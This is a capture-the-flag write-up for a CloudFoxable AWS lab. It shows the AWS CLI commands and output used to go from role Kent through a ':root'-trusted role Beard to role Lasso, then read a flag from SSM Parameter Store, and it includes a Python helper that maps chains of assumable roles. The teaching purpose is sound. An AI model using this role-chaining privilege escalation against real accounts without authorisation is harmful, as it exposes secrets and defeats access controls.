You’ve just gained access to the role Kent. Can you get to the root flag in the SSM parameter store?
Short and concise challenge details. I will start by preparing a profile for Kent and checking which policies are attached to the role.
```console
adicpnn@laboratory cloud % cat ~/.aws/config| tail
[profile kent]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/Kent
source_profile = cloudfoxable
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name Kent --profile cloudfoxable
{
    "AttachedPolicies": [
        {
            "PolicyName": "root-policy1",
            "PolicyArn": "arn:aws:iam::129323993607:policy/root-policy1"
        }
    ]
}
```
A single policy is attached; let's see what type of access it grants.
```console
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/root-policy1 --version-id v1 --profile cloudfoxable
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "sts:AssumeRole"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2026-03-11T15:43:57+00:00"
    }
}
```
Hmm, I've been given AssumeRole permissions. This means I need to find another role that has access to the target secret. Let me first find out more about this secret. There are several parameters in the SSM store, but only one with root in its name.
```console
adicpnn@laboratory cloud % aws ssm describe-parameters --profile cloudfoxable
{
    "Parameters": [
        {
            "Name": "/cloudfoxable/flag/executioner",
            "ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/executioner",
            "Type": "SecureString",
            "KeyId": "alias/aws/ssm",
            "LastModifiedDate": "2026-03-11T16:43:57.689000+01:00",
            "LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        },
        {
            "Name": "/cloudfoxable/flag/its-a-secret",
            "ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/its-a-secret",
            "Type": "SecureString",
            "KeyId": "alias/aws/ssm",
            "LastModifiedDate": "2026-03-11T16:43:57.734000+01:00",
            "LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        },
        {
            "Name": "/cloudfoxable/flag/its-another-secret",
            "ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/its-another-secret",
            "Type": "SecureString",
            "KeyId": "alias/aws/ssm",
            "LastModifiedDate": "2026-03-11T16:43:57.583000+01:00",
            "LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        },
        {
            "Name": "/cloudfoxable/flag/lambda-sqs",
            "ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/cloudfoxable/flag/lambda-sqs",
            "Type": "SecureString",
            "KeyId": "alias/aws/ssm",
            "LastModifiedDate": "2026-03-11T16:43:57.348000+01:00",
            "LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        },
        {
            "Name": "/production/CICD/root",
            "ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root",
            "Type": "SecureString",
            "KeyId": "alias/aws/ssm",
            "LastModifiedDate": "2026-03-11T16:43:57.575000+01:00",
            "LastModifiedUser": "arn:aws:iam::129323993607:user/terraform",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        },
```
Let's see if there is a resource policy attached to it.
```console
adicpnn@laboratory cloud % aws ssm get-resource-policies --resource-arn arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root --profile cloudfoxable
aws: [ERROR]: An error occurred (AccessDeniedException) when calling the GetResourcePolicies operation: User: arn:aws:iam::129323993607:user/ctf-starting-user is not authorized to perform: ssm:GetResourcePolicies on resource: arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root because no identity-based policy allows the ssm:GetResourcePolicies action
```
Looks like this is not something I can easily find out. I'll have to take another route: look for roles Kent might be able to assume, then go from there.
```console
adicpnn@laboratory cloud % aws iam list-roles --profile cloudfoxable | jq '.Roles | map({Arn,AssumeRolePolicyDocument})'
[
  {
    "Arn": "arn:aws:iam::129323993607:role/aaronson",
    "AssumeRolePolicyDocument": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "",
          "Effect": "Allow",
          "Principal": {
            "Service": "lambda.amazonaws.com"
          },
          "Action": "sts:AssumeRole"
        }
      ]
    }
  },
  {
    "Arn": "arn:aws:iam::129323993607:role/Alexander-Arnold",
    "AssumeRolePolicyDocument": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::129323993607:user/ctf-starting-user"
          },
          "Action": "sts:AssumeRole"
        }
      ]
    }
  },
  {
    "Arn": "arn:aws:iam::129323993607:role/Beard",
    "AssumeRolePolicyDocument": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "",
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::129323993607:root"
          },
          "Action": "sts:AssumeRole"
        }
      ]
    }
  },
  {
    "Arn": "arn:aws:iam::129323993607:role/Kent",
    "AssumeRolePolicyDocument": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::129323993607:user/ctf-starting-user"
          },
          "Action": "sts:AssumeRole"
        }
      ]
    }
  },
  ...
]
```
Note that the output of my previous command was truncated for readability. Looking at the results, there is no role whose trust policy explicitly names the Kent principal, but there is another interesting thing.
Quoting the AWS documentation, because the effect of referencing :root in an IAM role's trust policy is not self-explanatory:
Important: If you reference :root in an IAM role’s trust policy, you might allow more principals to assume your role than you intended, so it’s a best practice to use the Principal element or conditions to only allow specific principals or paths to assume a role.
Note: The suffix :root in the policy’s Principal element equates to the principals in the account, not the root user of that account.
This should mean that the role "Beard" can be assumed by any principal in this account! Note that this is not an explicit allow: the trust policy alone is not enough, and any principal wishing to assume this role must also carry an Allow for sts:AssumeRole in one of its own attached identity-based policies (the implicit side of the grant). Fortunately, the Kent role has exactly that statement in root-policy1, as we observed earlier.
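The trust-policy reasoning above can be checked mechanically. The following Python is an added example, not code from this write-up or from CloudFoxable: it parses `list-roles`-style JSON (a constructed sample mirroring the roles on this page), flags roles whose trust policy admits a whole account via `:root`, and walks the AssumeRole chain from a given principal, treating an account-wide trust as usable only when that identity also holds its own sts:AssumeRole grant. It assumes a single account, as on this page.

```python
import json

# Constructed sample modelled on the list-roles output in this write-up (same account id,
# same trust shapes); not live data and not CloudFoxable's own code.
ROLES = json.loads("""[
 {"Arn": "arn:aws:iam::129323993607:role/aaronson", "AssumeRolePolicyDocument": {"Statement": [
  {"Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"}, "Action": "sts:AssumeRole"}]}},
 {"Arn": "arn:aws:iam::129323993607:role/Kent", "AssumeRolePolicyDocument": {"Statement": [
  {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::129323993607:user/ctf-starting-user"},
   "Action": "sts:AssumeRole"}]}},
 {"Arn": "arn:aws:iam::129323993607:role/Beard", "AssumeRolePolicyDocument": {"Statement": [
  {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::129323993607:root"}, "Action": "sts:AssumeRole"}]}},
 {"Arn": "arn:aws:iam::129323993607:role/Lasso", "AssumeRolePolicyDocument": {"Statement": [
  {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::129323993607:role/Beard"}, "Action": "sts:AssumeRole"}]}}
]""")

def account_of(arn):
    return arn.split(":")[4]

def aws_trusts(role):
    """Yield (principal, account_wide) for every Allow sts:AssumeRole statement with an AWS principal."""
    for st in role["AssumeRolePolicyDocument"]["Statement"]:
        actions = st["Action"] if isinstance(st["Action"], list) else [st["Action"]]
        if st.get("Effect") != "Allow" or not {"sts:AssumeRole", "sts:*", "*"} & set(actions):
            continue
        principal = st.get("Principal", {})
        aws = ["*"] if principal == "*" else principal.get("AWS", [])
        for p in (aws if isinstance(aws, list) else [aws]):
            # ':root' or a bare account id admits every principal in that account, not the root user
            yield p, p == "*" or p.endswith(":root") or p.isdigit()

def account_wide_trusts(roles):
    """Roles whose trust policy admits a whole account (or anyone): the ones to review first."""
    return sorted(r["Arn"] for r in roles if any(wide for _, wide in aws_trusts(r)))

def reachable_roles(roles, start, can_assume):
    """Roles `start` reaches by chaining AssumeRole in one account. An explicit trust needs no extra
    grant; an account-wide trust only works if `start`/the current role is in `can_assume`."""
    reached, queue = set(), [start]
    while queue:
        cur = queue.pop(0)
        for r in roles:
            if r["Arn"] in reached or r["Arn"] == cur:
                continue
            for p, wide in aws_trusts(r):
                same_account = p == "*" or p == account_of(cur) or (p.endswith(":root") and account_of(p) == account_of(cur))
                if p == cur or (wide and same_account and cur in can_assume):
                    reached.add(r["Arn"]); queue.append(r["Arn"]); break
    return sorted(reached)
```

Running it with Kent in `can_assume` (Kent's root-policy1 allows sts:AssumeRole on *) reaches Beard and then Lasso; with an empty set Kent reaches nothing, which is exactly the distinction the AWS note draws.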
The next step should be straightforward: assume the role Beard. I went ahead and created another profile for this role, this time setting source_profile to the kent profile.
```console
adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile beard]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/Beard
source_profile = kent
adicpnn@laboratory cloud % aws sts get-caller-identity --profile beard
{
    "UserId": "AROAR4HCPRID7WWVC6H2G:botocore-session-1773311164",
    "Account": "129323993607",
    "Arn": "arn:aws:sts::129323993607:assumed-role/Beard/botocore-session-1773311164"
}
```
Now I have this role assumed, but I have no idea what permissions it has.
```console
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name Beard --profile cloudfoxable
{
    "AttachedPolicies": []
}
```
No policies? Maybe I missed something …
```console
adicpnn@laboratory cloud % aws iam list-roles --profile cloudfoxable | jq '.Roles | map({Arn,AssumeRolePolicyDocument})'
...
  {
    "Arn": "arn:aws:iam::129323993607:role/Lasso",
    "AssumeRolePolicyDocument": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "",
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::129323993607:role/Beard"
          },
          "Action": "sts:AssumeRole"
        }
      ]
    }
  },
...
```
Aha! There is another role, assumable only by Beard, and this time the trust policy names Beard explicitly.
```console
adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile lasso]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/Lasso
source_profile = beard
adicpnn@laboratory cloud % aws sts get-caller-identity --profile lasso
{
    "UserId": "AROAR4HCPRIDXLNPL22DM:botocore-session-1773311403",
    "Account": "129323993607",
    "Arn": "arn:aws:sts::129323993607:assumed-role/Lasso/botocore-session-1773311403"
}
```
Again I proceed by finding out what permissions this new role has.
```console
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name Lasso --profile cloudfoxable
{
    "AttachedPolicies": [
        {
            "PolicyName": "important-policy",
            "PolicyArn": "arn:aws:iam::129323993607:policy/important-policy"
        }
    ]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/important-policy --version-id v1 --profile cloudfoxable
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": "ssm:GetParameter",
                    "Effect": "Allow",
                    "Resource": "arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2026-03-11T15:44:04+00:00"
    }
}
```
That's it, I've reached the point where I can access the target.

Execution
```console
{
    "Parameter": {
        "Name": "/production/CICD/root",
        "Type": "SecureString",
        "Value": "FLAG{root::ExploitingRoleTrustsIsFun}",
        "Version": 1,
        "LastModifiedDate": "2026-03-11T16:43:57.575000+01:00",
        "ARN": "arn:aws:ssm:eu-central-1:129323993607:parameter/production/CICD/root",
        "DataType": "text"
    }
}
```